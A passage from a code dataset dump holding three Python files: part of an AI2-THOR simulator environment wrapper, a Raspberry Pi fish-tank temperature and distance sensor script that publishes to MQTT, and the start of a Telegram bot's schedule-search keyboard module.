pu.get_rel_pose_change(curr_sim_pose, self.last_sim_location)\n self.last_sim_location = curr_sim_pose\n return dx, dy, do\n \n\n def get_sim_location(self):\n y = -self.event.metadata['agent']['position']['x']\n x = self.event.metadata['agent']['position']['z'] \n o = np.deg2rad(-self.event.metadata['agent']['rotation']['y'])\n if o > np.pi:\n o -= 2 * np.pi\n return x, y, o\n \n def get_metrics(self):\n curr_loc = self.sim_continuous_to_sim_map(self.get_sim_location())\n dist = self.gt_planner.fmm_dist[curr_loc[0], curr_loc[1]]/20.0\n if dist == 0.0:\n success = 1\n else:\n success = 0\n spl = min(success * self.starting_distance/self.path_length, 1)\n return spl, success, dist\n\n def get_done(self):\n if self.info['time'] >= self.args.max_episode_length-1:\n done = True\n elif self.stopped:\n done = True\n else:\n done = False\n return done\n\n\n def check_post_conditions(self, action):\n '''\n handle special action post-conditions\n '''\n if action['action'] == 'ToggleObjectOn':\n self.check_clean(action['objectId'])\n\n def update_states(self, action):\n '''\n extra updates to metadata after step\n '''\n event = self.event\n if event.metadata['lastActionSuccess']:\n # clean\n if action['action'] == 'ToggleObjectOn' and \"Faucet\" in action['objectId']:\n sink_basin = get_obj_of_type_closest_to_obj('SinkBasin', action['objectId'], event.metadata)\n cleaned_object_ids = sink_basin['receptacleObjectIds']\n self.cleaned_objects = self.cleaned_objects | set(cleaned_object_ids) if cleaned_object_ids is not None else set()\n # heat\n if action['action'] == 'ToggleObjectOn' and \"Microwave\" in action['objectId']:\n microwave = get_objects_of_type('Microwave', event.metadata)[0]\n heated_object_ids = microwave['receptacleObjectIds']\n self.heated_objects = self.heated_objects | set(heated_object_ids) if heated_object_ids is not None else set()\n # cool\n if action['action'] == 'CloseObject' and \"Fridge\" in action['objectId']:\n fridge = get_objects_of_type('Fridge', event.metadata)[0]\n cooled_object_ids = fridge['receptacleObjectIds']\n self.cooled_objects = self.cooled_objects | set(cooled_object_ids) if cooled_object_ids is not None else set()\n\n return event\n\n def get_transition_reward(self):\n if self.task is None:\n raise Exception(\"WARNING: no task setup for transition_reward\")\n else:\n return self.task.transition_reward(self.event)\n\n def get_goal_satisfied(self):\n if self.task is None:\n raise Exception(\"WARNING: no task setup for goal_satisfied\")\n else:\n return self.task.goal_satisfied(self.event)\n\n def get_goal_conditions_met(self):\n if self.task is None:\n raise Exception(\"WARNING: no task setup for goal_satisfied\")\n else:\n return self.task.goal_conditions_met(self.event)\n\n def get_subgoal_idx(self):\n if self.task is None:\n raise Exception(\"WARNING: no task setup for subgoal_idx\")\n else:\n return self.task.get_subgoal_idx()\n\n def noop(self):\n '''\n do nothing\n '''\n super().step(dict(action='Pass'))\n\n def smooth_move_ahead(self, action, render_settings=None):\n '''\n smoother MoveAhead\n '''\n if render_settings is None:\n render_settings = DEFAULT_RENDER_SETTINGS\n smoothing_factor = constants.RECORD_SMOOTHING_FACTOR\n new_action = copy.deepcopy(action)\n new_action['moveMagnitude'] = constants.AGENT_STEP_SIZE / smoothing_factor\n\n new_action['renderImage'] = render_settings['renderImage']\n new_action['renderClassImage'] = render_settings['renderClassImage']\n new_action['renderObjectImage'] = render_settings['renderObjectImage']\n new_action['renderDepthImage'] = render_settings['renderDepthImage']\n\n events = []\n for xx in range(smoothing_factor - 1):\n event = super().step(new_action)\n if event.metadata['lastActionSuccess']:\n events.append(event)\n\n event = super().step(new_action)\n if event.metadata['lastActionSuccess']:\n events.append(event)\n return events\n\n def smooth_rotate(self, action, render_settings=None):\n '''\n smoother RotateLeft and RotateRight\n '''\n if render_settings is None:\n render_settings = DEFAULT_RENDER_SETTINGS\n event = self.event\n horizon = np.round(event.metadata['agent']['cameraHorizon'], 4)\n position = event.metadata['agent']['position']\n rotation = event.metadata['agent']['rotation']\n start_rotation = rotation['y']\n if action['action'] == 'RotateLeft':\n end_rotation = (start_rotation - 30)\n else:\n end_rotation = (start_rotation + 30)\n\n events = []\n for xx in np.arange(.1, 1.0001, .1):\n if xx < 1:\n teleport_action = {\n 'action': 'TeleportFull',\n 'rotation': np.round(start_rotation * (1 - xx) + end_rotation * xx, 3),\n 'x': position['x'],\n 'z': position['z'],\n 'y': position['y'],\n 'horizon': horizon,\n 'tempRenderChange': True,\n 'renderNormalsImage': False,\n 'renderImage': render_settings['renderImage'],\n 'renderClassImage': render_settings['renderClassImage'],\n 'renderObjectImage': render_settings['renderObjectImage'],\n 'renderDepthImage': render_settings['renderDepthImage'],\n }\n event = super().step(teleport_action)\n else:\n teleport_action = {\n 'action': 'TeleportFull',\n 'rotation': np.round(start_rotation * (1 - xx) + end_rotation * xx, 3),\n 'x': position['x'],\n 'z': position['z'],\n 'y': position['y'],\n 'horizon': horizon,\n }\n event = super().step(teleport_action)\n\n if event.metadata['lastActionSuccess']:\n events.append(event)\n return events\n\n def smooth_look(self, action, render_settings=None):\n '''\n smoother LookUp and LookDown\n '''\n if render_settings is None:\n render_settings = DEFAULT_RENDER_SETTINGS\n event = self.event\n start_horizon = event.metadata['agent']['cameraHorizon']\n rotation = np.round(event.metadata['agent']['rotation']['y'], 4)\n end_horizon = start_horizon + constants.AGENT_HORIZON_ADJ * (1 - 2 * int(action['action'] == 'LookUp'))\n position = event.metadata['agent']['position']\n\n events = []\n for xx in np.arange(.1, 1.0001, .1):\n if xx < 1:\n teleport_action = {\n 'action': 'TeleportFull',\n 'rotation': rotation,\n 'x': position['x'],\n 'z': position['z'],\n 'y': position['y'],\n 'horizon': np.round(start_horizon * (1 - xx) + end_horizon * xx, 3),\n 'tempRenderChange': True,\n 'renderNormalsImage': False,\n 'renderImage': render_settings['renderImage'],\n 'renderClassImage': render_settings['renderClassImage'],\n 'renderObjectImage': render_settings['renderObjectImage'],\n 'renderDepthImage': render_settings['renderDepthImage'],\n }\n event = super().step(teleport_action)\n else:\n teleport_action = {\n 'action': 'TeleportFull',\n 'rotation': rotation,\n 'x': position['x'],\n 'z': position['z'],\n 'y': position['y'],\n 'horizon': np.round(start_horizon * (1 - xx) + end_horizon * xx, 3),\n }\n event = super().step(teleport_action)\n\n if event.metadata['lastActionSuccess']:\n events.append(event)\n return events\n\n def height_change(self, height_change, render_settings=None):\n if render_settings is None:\n render_settings = DEFAULT_RENDER_SETTINGS\n event = self.event\n horizon = event.metadata['agent']['cameraHorizon']\n position = event.metadata['agent']['position']\n rotation = event.metadata['agent']['rotation']['y']\n \n teleport_action = {\n 'action': 'TeleportFull',\n 'rotation': rotation,\n 'x': position['x'],\n 'z': position['z'],\n 'y': position['y'] + height_change,\n 'horizon': horizon,\n 'tempRenderChange': True,\n 'renderNormalsImage': False,\n 'renderImage': render_settings['renderImage'],\n 'renderClassImage': render_settings['renderClassImage'],\n 'renderObjectImage': render_settings['renderObjectImage'],\n 'renderDepthImage': render_settings['renderDepthImage'],\n }\n #event = super().step(teleport_action)\n #return event\n super().step(teleport_action)\n \n self.event = event\n dx, dy, do = self.get_pose_change()\n #print(\"pose change is \", dx, dy, do)\n self.info['sensor_pose'] = [dx, dy, do]\n self.path_length += pu.get_l2_distance(0, dx, 0, dy)\n \n done = self.get_done()\n \n if done:\n #spl, success, dist = self.get_metrics()\n spl, success, dist = 0,0,0\n #print(\"spl, succ, dist: {}, {}, {}\".format(spl, success, dist))\n self.info['distance_to_goal'] = dist\n self.info['spl'] = spl\n self.info['success'] = success\n \n #self.info['sensor_pose'] = \n \n self.timestep += 1\n self.info['time'] = self.timestep\n \n rgb = torch.tensor(self.event.frame.copy()).numpy() #shape (h, w, 3)\n depth = torch.tensor(self.event.depth_frame.copy()).numpy() #shape (h, w)\n depth /= 1000.0\n depth = np.expand_dims(depth, 2)\n \n state = np.concatenate((rgb, depth), axis = 2).transpose(2, 0, 1)\n \n rew = 0.0\n #print(\"position['y'] is \", position['y'])\n return state, rew, done, self.info\n\n def look_angle(self, angle, render_settings=None):\n '''\n look at a specific angle\n '''\n if render_settings is None:\n render_settings = DEFAULT_RENDER_SETTINGS\n event = self.event\n start_horizon = event.metadata['agent']['cameraHorizon']\n rotation = np.round(event.metadata['agent']['rotation']['y'], 4)\n end_horizon = start_horizon + angle\n position = event.metadata['agent']['position']\n\n teleport_action = {\n 'action': 'TeleportFull',\n 'rotation': rotation,\n 'x': position['x'],\n 'z': position['z'],\n 'y': position['y'],\n 'horizon': np.round(end_horizon, 3),\n 'tempRenderChange': True,\n 'renderNormalsImage': False,\n 'renderImage': render_settings['renderImage'],\n 'renderClassImage': render_settings['renderClassImage'],\n 'renderObjectImage': render_settings['renderObjectImage'],\n 'renderDepthImage': render_settings['renderDepthImage'],\n }\n event = super().step(teleport_action)\n self.view_angle += angle\n return event\n \n def set_horizon(self, angle, render_settings=None):\n '''\n look at a specific angle\n '''\n if render_settings is None:\n render_settings = DEFAULT_RENDER_SETTINGS\n event = self.event\n #start_horizon = event.metadata['agent']['cameraHorizon']\n rotation = np.round(event.metadata['agent']['rotation']['y'], 4)\n end_horizon = angle\n position = event.metadata['agent']['position']\n\n teleport_action = {\n 'action': 'TeleportFull',\n 'rotation': rotation,\n 'x': position['x'],\n 'z': position['z'],\n 'y': position['y'],\n 'horizon': np.round(end_horizon, 3),\n 'tempRenderChange': True,\n 'renderNormalsImage': False,\n 'renderImage': render_settings['renderImage'],\n 'renderClassImage': render_settings['renderClassImage'],\n 'renderObjectImage': render_settings['renderObjectImage'],\n 'renderDepthImage': render_settings['renderDepthImage'],\n }\n event = super().step(teleport_action)\n return event\n\n def rotate_angle(self, angle, render_settings=None):\n '''\n rotate at a specific angle\n '''\n if render_settings is None:\n render_settings = DEFAULT_RENDER_SETTINGS\n event = self.event\n horizon = np.round(event.metadata['agent']['cameraHorizon'], 4)\n position = event.metadata['agent']['position']\n rotation = event.metadata['agent']['rotation']\n start_rotation = rotation['y']\n end_rotation = start_rotation + angle\n\n teleport_action = {\n 'action': 'TeleportFull',\n 'rotation': np.round(end_rotation, 3),\n 'x': position['x'],\n 'z': position['z'],\n 'y': position['y'],\n 'horizon': horizon,\n 'tempRenderChange': True,\n 'renderNormalsImage': False,\n 'renderImage': render_settings['renderImage'],\n 'renderClassImage': render_settings['renderClassImage'],\n 'renderObjectImage': render_settings['renderObjectImage'],\n 'renderDepthImage': render_settings['renderDepthImage'],\n }\n super().step(teleport_action)\n\n def to_thor_api_exec(self, action, object_id=\"\", smooth_nav=False):\n action_received = copy.deepcopy(action)\n self.action_received =action_received\n self.last_action = action_received\n\n if \"RotateLeft\" in action:\n action = dict(action=\"RotateLeft\", degrees = \"90\",\n forceAction=True)\n obs, rew, done, info = self.step(action, smooth_nav=smooth_nav)\n elif \"RotateRight\" in action:\n action = dict(action=\"RotateRight\", degrees = \"90\",\n forceAction=True)\n obs, rew, done, info = self.step(action, smooth_nav=smooth_nav)\n elif \"MoveAhead\" in action:\n action = dict(action=\"MoveAhead\",\n forceAction=True)\n obs, rew, done, info = self.step(action, smooth_nav=smooth_nav)\n elif \"LookUp\" in action:\n #if abs(self.event.metadata['agent']['cameraHorizon']-0) <5:\n if abs(self.camera_horizon - 0) <5:\n action = dict(action=\"LookUp_0\",\n forceAction=True)\n else:\n action = dict(action=action,\n forceAction=True)\n obs, rew, done, info = self.step(action, smooth_nav=smooth_nav)\n elif \"LookDown\" in action:\n #if abs(self.event.metadata['agent']['cameraHorizon'] - 90) <5:\n if abs(self.camera_horizon - 90) <5:\n action = dict(action=\"LookDown_0\",\n forceAction=True)\n else:\n action = dict(action=action,\n forceAction=True)\n obs, rew, done, info= self.step(action, smooth_nav=smooth_nav)\n elif \"OpenObject\" in action:\n action = dict(action=\"OpenObject\",\n objectId=object_id,\n moveMagnitude=1.0)\n obs, rew, done, info = self.step(action)\n elif \"CloseObject\" in action:\n action = dict(action=\"CloseObject\",\n objectId=object_id,\n forceAction=True)\n obs, rew, done, info = self.step(action)\n elif \"PickupObject\" in action:\n action = dict(action=\"PickupObject\",\n objectId=object_id)\n obs, rew, done, info = self.step(action)\n elif \"PutObject\" in action:\n inventory_object_id = self.event.metadata['inventoryObjects'][0]['objectId']\n new_inventory_object_id = self.event.metadata['inventoryObjects'][0]['objectId']\n action = dict(action=\"PutObject\",\n objectId=inventory_object_id,\n receptacleObjectId=object_id,\n forceAction=True,\n placeStationary=True)\n obs, rew, done, info = self.step(action)\n elif \"ToggleObjectOn\" in action:\n action = dict(action=\"ToggleObjectOn\",\n objectId=object_id)\n obs, rew, done, info = self.step(action)\n\n elif \"ToggleObjectOff\" in action:\n action = dict(action=\"ToggleObjectOff\",\n objectId=object_id)\n obs, rew, done, info = self.step(action)\n elif \"SliceObject\" in action:\n # check if agent is holding knife in hand\n inventory_objects = self.event.metadata['inventoryObjects']\n if len(inventory_objects) == 0 or 'Knife' not in inventory_objects[0]['objectType']:\n raise Exception(\"Agent should be holding a knife before slicing.\")\n\n action = dict(action=\"SliceObject\",\n objectId=object_id)\n obs, rew, done, info = self.step(action)\n else:\n raise Exception(\"Invalid action. Conversion to THOR API failed! (action='\" + str(action) + \"')\")\n\n return obs, rew, done, info, self.event, action\n \n\n def check_clean(self, object_id):\n '''\n Handle special case when Faucet is toggled on.\n In this case, we need to execute a `CleanAction` in the simulator on every object in the corresponding\n basin. This is to clean everything in the sink rather than just things touching the stream.\n '''\n event = self.event\n if event.metadata['lastActionSuccess'] and 'Faucet' in object_id:\n # Need to delay one frame to let `isDirty` update on stream-affected.\n self.step({'action': 'Pass'})\n event = self.event\n sink_basin_obj = game_util.get_obj_of_type_closest_to_obj(\"SinkBasin\", object_id, event.metadata)\n for in_sink_obj_id in sink_basin_obj['receptacleObjectIds']:\n if (game_util.get_object(in_sink_obj_id, event.metadata)['dirtyable']\n and game_util.get_object(in_sink_obj_id, event.metadata)['isDirty']):\n self.step({'action': 'CleanObject', 'objectId': in_sink_obj_id})\n return self.event\n\n def prune_by_any_interaction(self, instances_ids):\n '''\n ignores any object that is not interactable in anyway\n '''\n pruned_instance_ids = []\n for obj in self.event.metadata['objects']:\n obj_id = obj['objectId']\n if obj_id in instances_ids:\n if obj['pickupable'] or obj['receptacle'] or obj['openable'] or obj['toggleable'] or obj['sliceable']:\n pruned_instance_ids.append(obj_id) \n\n ordered_instance_ids = [id for id in instances_ids if id in pruned_instance_ids]\n return ordered_instance_ids\n \n \n def print_log(self, *statements):\n statements = [str(s) for s in statements]\n statements = ['step #: ', str(self.steps_taken) , \",\"] + statements\n joined = ' '.join(statements)\n #print(joined)\n self.logs.append(joined)\n\n #Interact if within visibility distance\n def va_interact(self, action, interact_mask=None, smooth_nav=False, mask_px_sample=1, debug=False):\n '''\n interact mask based action call\n '''\n\n all_ids = []\n\n if type(interact_mask) is str and interact_mask == \"NULL\":\n raise Exception(\"NULL mask.\")\n elif interact_mask is not None:\n # ground-truth instance segmentation mask from THOR\n instance_segs = np.array(self.event.instance_segmentation_frame)\n color_to_object_id = self.event.color_to_object_id\n\n # get object_id for each 1-pixel in the interact_mask\n nz_rows, nz_cols = np.nonzero(interact_mask)\n instance_counter = Counter()\n for i in range(0, len(nz_rows), mask_px_sample):\n x, y = nz_rows[i], nz_cols[i]\n instance = tuple(instance_segs[x, y])\n instance_counter[instance] += 1\n if debug:\n print(\"action_box\", \"instance_counter\", instance_counter)\n\n # iou scores for all instances\n iou_scores = {}\n for color_id, intersection_count in instance_counter.most_common():\n union_count = np.sum(np.logical_or(np.all(instance_segs == color_id, axis=2), interact_mask.astype(bool)))\n iou_scores[color_id] = intersection_count / float(union_count)\n iou_sorted_instance_ids = list(OrderedDict(sorted(iou_scores.items(), key=lambda x: x[1], reverse=True)))\n\n # get the most common object ids ignoring the object-in-hand\n inv_obj = self.event.metadata['inventoryObjects'][0]['objectId'] \\\n if len(self.event.metadata['inventoryObjects']) > 0 else None\n all_ids = [color_to_object_id[color_id] for color_id in iou_sorted_instance_ids\n if color_id in color_to_object_id and color_to_object_id[color_id] != inv_obj]\n\n # print all ids\n if debug:\n print(\"action_box\", \"all_ids\", all_ids)\n\n # print instance_ids\n instance_ids = [inst_id for inst_id in all_ids if inst_id is not None]\n instance_ids = self.prune_by_any_interaction(instance_ids)\n if debug:\n print(\"action_box\", \"instance_ids\", instance_ids)\n\n # prune invalid instances like floors, walls, etc.\n if self.args.ground_truth_segmentation:\n pass\n else:\n instance_ids_new = self.prune_by_any_interaction(instance_ids)\n for instance_id in instance_ids:\n if 'Sink' in instance_id:\n instance_ids_new.append(instance_id)\n\n # cv2 imshows to show image, segmentation mask, interact mask\n if debug:\n print(\"action_box\", \"instance_ids\", instance_ids)\n instance_seg = copy.copy(instance_segs)\n instance_seg[:, :, :] = interact_mask[:, :, np.newaxis] == 1\n instance_seg *= 255\n\n cv2.imshow('seg', instance_segs)\n cv2.imshow('mask', instance_seg)\n cv2.imshow('full', self.event.frame[:,:,::-1])\n cv2.waitKey(0)\n\n if len(instance_ids) == 0:\n if not (\"Rotate\" in action or \"MoveAhead\" in action or \"Look\" in action):\n err = \"Bad interact mask. Couldn't locate target object\"\n print(\"Went through bad interaction mask\")\n success = False\n rgb = self.event.frame.copy() #shape (h, w, 3)\n rgb = cv2.cvtColor(rgb, cv2.COLOR_RGB2BGR)\n\n depth = torch.tensor(self.event.depth_frame.copy()).numpy() #shape (h, w)\n depth /= 1000.0 #in meters\n depth = np.expand_dims(depth, 2)\n\n state = np.concatenate((rgb, depth), axis = 2).transpose(2, 0, 1)\n return state, 0, False, self.info, False, None, \"\", err, None\n else:\n target_instance_id = \"\"\n if len(instance_ids) != 0:\n target_instance_id = instance_ids[0]\n \n else:\n target_instance_id = \"\"\n\n if debug:\n print(\"taking action: \" + str(action) + \" on target_instance_id \" + str(target_instance_id))\n try:\n obs, rew, done, infos, event, api_action = self.to_thor_api_exec(action, target_instance_id, smooth_nav)\n except Exception as err:\n success = False\n rgb = self.event.frame.copy() #shape (h, w, 3)\n rgb = cv2.cvtColor(rgb, cv2.COLOR_RGB2BGR)\n\n depth = torch.tensor(self.event.depth_frame.copy()).numpy() #shape (h, w)\n depth /= 1000.0 #in meters\n depth = np.expand_dims(depth, 2)\n\n state = np.concatenate((rgb, depth), axis = 2).transpose(2, 0, 1)\n return state, 0, False, self.info, success, None, \"\", err, None\n\n if not event.metadata['lastActionSuccess']:\n if interact_mask is not None and debug:\n print(\"Failed to execute action!\", action, target_instance_id)\n print(\"all_ids inside BBox: \" + str(all_ids))\n instance_seg = copy.copy(instance_segs)\n instance_seg[:, :, :] = interact_mask[:, :, np.newaxis] == 1\n cv2.imshow('seg', instance_segs)\n cv2.imshow('mask', instance_seg)\n cv2.imshow('full', self.event.frame[:,:,::-1])\n cv2.waitKey(0)\n print(event.metadata['errorMessage'])\n success = False\n if len(event.metadata['errorMessage']) >0:\n print(\"action that causes below error is \", api_action)\n return obs, rew, done, infos, success, event, target_instance_id, event.metadata['errorMessage'], api_action\n\n success = True\n\n return obs, rew, done, infos, success, event, target_instance_id, '', api_action\n\n @staticmethod\n def bbox_to_mask(bbox):\n return image_util.bbox_to_mask(bbox)\n\n @staticmethod\n def point_to_mask(point):\n return image_util.point_to_mask(point)\n\n @staticmethod\n def decompress_mask(compressed_mask):\n return image_util.decompress_mask(compressed_mask)\n \n def get_instance_mask(self):\n return self.event.instance_masks\n \n def close(self):\n self.stop()\n","repo_name":"soyeonm/FILM","sub_path":"alfred_utils/env/thor_env_code.py","file_name":"thor_env_code.py","file_ext":"py","file_size_in_byte":48982,"program_lang":"python","lang":"en","doc_type":"code","stars":98,"dataset":"github-code","pt":"53"} +{"seq_id":"74103190887","text":"import os\nimport glob\nimport time\nimport logging\nimport yaml\nimport datetime\nfrom gpiozero import DistanceSensor\n# from gpiozero.pins.pigpio import PiGPIOFactory\n\n\n# Pull in 1 Wire capablities\nos.system('modprobe w1-gpio')\nos.system('modprobe w1-therm')\n\n# Without a 1-wire device recognized here the code will crash/exit.\nbase_dir = '/sys/bus/w1/devices/'\ndevice_folder = glob.glob(base_dir + '28*')[0]\ndevice_file = device_folder + '/w1_slave'\n\n# Setup Logger\n# logging.disable(logging.DEBUG)\nlogging.basicConfig(level=logging.DEBUG,\n format=' %(asctime)s - %(levelname)s - %(message)s')\n\n# keep decimal to ensure float\nsleeptime = 5.0\n\n# Pins for the sensor.\necho_pin = 23\ntrigger_pin = 24\n\n# Switch from default to potentially more accurate readings.\n# factory = PiGPIOFactory()\n# need pigpio daemon:\n# sudo pigpiod\n\n# Create empty list-type variable so we can\n# store measurements\nsensor_measurements = []\n\n# For the Distance Sensor\n# Declare these variables at a top level so you can\n# easily edit them once for your whole script to\n# test performance\nupper_reasonable_bound = 200\nlower_reasonable_bound = 0\nrolling_average_size = 10\n\n# Limits for temperature sensor\ntemp_low = 25\ntemp_high = 95\n\n\n# 1-wire read\ndef read_temp_raw():\n f = open(device_file, 'r')\n lines = f.readlines()\n f.close()\n return lines\n\n\n# 1-wire read and convert\ndef read_temp():\n lines = read_temp_raw()\n # Example:\n # Lines: ['a0 01 4b 46 7f ff 0c 10 cf : crc=cf YES\\n', 'a0 01 4b 46 7f ff 0c 10 cf t=26000\\n']\n # print(\"Lines: \" + str(lines))\n if (len(lines) < 1 or len(lines[0]) < 3): return None, None\n while lines[0].strip()[-3:] != 'YES':\n time.sleep(0.2)\n lines = read_temp_raw()\n equals_pos = lines[1].find('t=')\n if equals_pos != -1:\n temp_string = lines[1][equals_pos+2:]\n temp_c = float(temp_string) / 1000.0\n temp_f = temp_c * 9.0 / 5.0 + 32.0\n\n # Check that temperature is within limits.\n if temp_f > temp_high or temp_f < temp_low: \n return None, None\n return temp_c, temp_f\n\n\n# PID file for monit\ndef writePidFile():\n pid = str(os.getpid())\n currentFile = open('/tmp/1-wire.pid', 'w')\n currentFile.write(pid)\n currentFile.close()\n\n\ndef average(measurements):\n \"\"\"\n Use the builtin functions sum and len to make a quick average function\n \"\"\"\n # Handle division by zero error\n if len(measurements) != 0:\n return sum(measurements)/len(measurements)\n else:\n # When you use the average later, make sure to include something like\n # sensor_average = rolling_average(sensor_measurements)\n # if (conditions) and sensor_average > -1:\n # This way, -1 can be used as an \"invalid\" value\n return -1\n\n\ndef rolling_average(measurement, measurements):\n # Update rolling average if measurement is ok, otherwise\n # skip to returning the average from previous values\n if lower_reasonable_bound < measurement < upper_reasonable_bound:\n # Remove first item from list if it's full according to our chosen size\n if len(measurements) >= rolling_average_size:\n measurements.pop(0)\n measurements.append(measurement)\n return average(measurements)\n\n\nerrorcount = 0\n\n# device configs\nwith open(\"config.yml\", 'r') as ymlfile:\n cfg = yaml.load(ymlfile, Loader=yaml.FullLoader)\n\n# Setup MQTT\nclient = ''\nif cfg['mqtt']['enabled'] is True:\n import paho.mqtt.client as mqtt\n client = mqtt.Client(\"P1\") # create new instance\n client.connect(cfg['mqtt']['host']) # connect to broker\n # Loop start: These functions implement a threaded interface\n # to the network loop. Calling loop_start() once, before or after\n # connect*(), runs a thread in the background to call loop()\n # automatically. This frees up the main thread for other work\n # that may be blocking.\n client.loop_start()\n\nwritePidFile()\ndist_sensor = DistanceSensor(echo=echo_pin, trigger=trigger_pin) #, pin_factory=factory)\nstarttime = time.time()\nwhile True:\n # 1 -wire read:\n temps = read_temp()\n # print(\"Temp (C,F): \" + str(temps))\n\n # Distance Sensor measurement\n sensor_measurement = (dist_sensor.distance * 100)\n sensor_value = rolling_average(sensor_measurement, sensor_measurements)\n\n # fix for JSON, MQTT, InfluxDB\n s = datetime.datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f')\n timestamp = s[:-3]\n logging.debug(\"Timestamp, Data: \" + str(timestamp) + \", \" + str(temps[1])\n + \", Distance: \" + str(\"{:.2f}\".format(sensor_value)))\n if cfg['mqtt']['enabled'] is True:\n client.publish(cfg['mqtt']['topic'], '{ \"koi_temperature\":\"' +\n str(temps[1]) + '\", \"datetime\":\"' + str(timestamp) +\n '\", \"koi_distance\":\"' +\n str(\"{:.2f}\".format(sensor_value))\n + '\" }') # publish to mqtt\n time.sleep(sleeptime - ((time.time() - starttime) % sleeptime))\n","repo_name":"kmkingsbury/pi-fishtank-sensors","sub_path":"fishtank-sensors.py","file_name":"fishtank-sensors.py","file_ext":"py","file_size_in_byte":4994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29182296915","text":"\"\"\"\nmcd.py - script for 'mcd' command\n\"\"\"\n\nimport typing\nimport logging\nfrom math import ceil\n\nfrom aiogram.types import InlineKeyboardMarkup, InlineKeyboardButton\nfrom aiogram.types import CallbackQuery, ChatActions\n\nimport text\nimport util\nfrom data import conn\nfrom util import schedule, callback_builder\nfrom scripts.search import schedule_kboard, get_selection_bar\n\n\nclass Call(typing.NamedTuple):\n DIR = 'DIR'\n TABLE = 'TABLE'\n MSTTO = 'MSTTO'\n MSTFROM = 'MSTFROM'\n CANCEL = 'CANCEL' # sys_command\n IGNORE = 'IGNORE' # sys_command\n DELETE = 'DELETE' # sys_command\n UPDATE = 'UPDATE' # skip to search_worker\n REVERSE = 'REVERSE' # skip to search_worker\n SCHEDULE = 'SCHEDULE' # skip to search_worker\n\n\nclass MarkupText(typing.NamedTuple):\n STTO = 'Станция назначения'\n STFROM = 'Станция отправления'\n MSTTO = 'Выбери станцию назначения'\n MSTFROM = 'Выбери станцию отправления'\n\n\ncallback_cancel = Call.CANCEL\ncallback_ignore = Call.IGNORE\ncallback_delete = Call.DELETE\n\n\nasync def mcd_table(root: typing.Dict[str, str]) -> InlineKeyboardMarkup:\n \"\"\"\n Builds mcd search table keyboard\n \"\"\"\n keyboard = InlineKeyboardMarkup(row_width=2)\n callback_to = await callback_builder(root, Call.MSTTO)\n callback_from = await callback_builder(root, Call.MSTFROM)\n callback_schedule = await callback_builder(root, Call.SCHEDULE)\n\n sto_field_is_completed = root.get('sto') not in (None, '')\n sfrom_field_is_completed = root.get('sfrom') not in (None, '')\n\n if sto_field_is_completed:\n station_to = conn.execute(\n 'SELECT name FROM station WHERE id = ?', (root['sto'],)\n ).fetchone()['name']\n else:\n station_to = ' '\n if sfrom_field_is_completed:\n station_from = conn.execute(\n 'SELECT name FROM station WHERE id = ?', (root['sfrom'],)\n ).fetchone()['name']\n else:\n station_from = ' '\n\n direction = conn.execute(\n 'SELECT name FROM direction WHERE id = ?', (root['dir'],)\n ).fetchone()['name']\n callback_dir = await callback_builder(root, Call.DIR)\n keyboard.add(InlineKeyboardButton(direction, callback_data=callback_dir))\n\n keyboard.add(\n InlineKeyboardButton(MarkupText.STFROM, callback_data=callback_ignore),\n InlineKeyboardButton(MarkupText.STTO, callback_data=callback_ignore),\n InlineKeyboardButton(station_from, callback_data=callback_from),\n InlineKeyboardButton(station_to, callback_data=callback_to),\n )\n if sfrom_field_is_completed and sto_field_is_completed:\n keyboard.add(\n InlineKeyboardButton(\n 'Показать расписание', callback_data=callback_schedule\n )\n )\n keyboard.add(InlineKeyboardButton('Отмена', callback_data=callback_cancel))\n return keyboard\n\n\nasync def mcd_direction_kboard(root: typing.Dict[str, str]) -> InlineKeyboardMarkup:\n \"\"\"\n Builds direction keyboard with directions column\n \"\"\"\n keyboard = InlineKeyboardMarkup(row_width=2)\n id_list = [\n item['id']\n for item in conn.execute('SELECT id FROM direction WHERE id > 10').fetchall()\n ]\n name_list = [\n item['name']\n for item in conn.execute('SELECT name FROM direction WHERE id > 10').fetchall()\n ]\n callback_list = [\n await callback_builder(root, Call.TABLE, dir=id, sfrom='', sto='', page=0)\n for id in id_list\n ]\n buttons = [\n InlineKeyboardButton(name, callback_data=callback)\n for name, callback in zip(name_list, callback_list)\n ]\n keyboard.add(*buttons)\n keyboard.add(InlineKeyboardButton('Отмена', callback_data=callback_cancel))\n return keyboard\n\n\nasync def mcd_station_kboard(root: typing.Dict[str, str],\n lines: int = 14) -> InlineKeyboardMarkup:\n \"\"\"\n Builds station keyboard with stations column and pages selection bar\n \"\"\"\n keyboard = InlineKeyboardMarkup(row_width=2)\n id_list = [\n item['id']\n for item in conn.execute(\n 'SELECT id FROM station WHERE mcdid = ?', (root['dir'],)\n ).fetchall()\n ]\n name_list = [\n item['name']\n for item in conn.execute(\n 'SELECT name FROM station WHERE mcdid = ?', (root['dir'],)\n ).fetchall()\n ]\n if root['call'] == Call.MSTFROM:\n callback_list = [\n await callback_builder(root, Call.TABLE, sfrom=id)\n for id in id_list\n ]\n elif root['call'] == Call.MSTTO:\n callback_list = [\n await callback_builder(root, Call.TABLE, sto=id)\n for id in id_list\n ]\n buttons = [\n InlineKeyboardButton(name, callback_data=callback)\n for name, callback in zip(name_list, callback_list)\n ]\n\n pages = ceil(id_list.__len__() / lines)\n if root.get('page') in (None, ''):\n page = 0\n else:\n page = int(root['page'])\n selection_bar = await get_selection_bar(root, page, pages)\n\n keyboard.add(*buttons[page * lines : page * lines + lines])\n keyboard.row(*selection_bar)\n keyboard.add(InlineKeyboardButton('Отмена', callback_data=callback_cancel))\n return keyboard\n\n\nasync def mcd_worker(call: CallbackQuery) -> None:\n \"\"\"\n Check for callback for this script\n \"\"\"\n procedure = await util.loads(call.data)\n\n if procedure['call'] == Call.DIR:\n message_text = text.MCD\n markup = await mcd_direction_kboard(procedure)\n await call.message.edit_text(message_text, reply_markup=markup)\n return None\n \n elif procedure['call'] == Call.TABLE:\n message_text = text.SEARCH\n markup = await mcd_table(procedure)\n await call.message.edit_text(message_text, reply_markup=markup)\n return None\n\n elif procedure['call'] == Call.MSTFROM:\n message_text = MarkupText.MSTFROM\n markup = await mcd_station_kboard(procedure)\n await call.message.edit_text(message_text, reply_markup=markup)\n return None\n\n elif procedure['call'] == Call.MSTTO:\n message_text = MarkupText.MSTTO\n markup = await mcd_station_kboard(procedure)\n await call.message.edit_text(message_text, reply_markup=markup)\n return 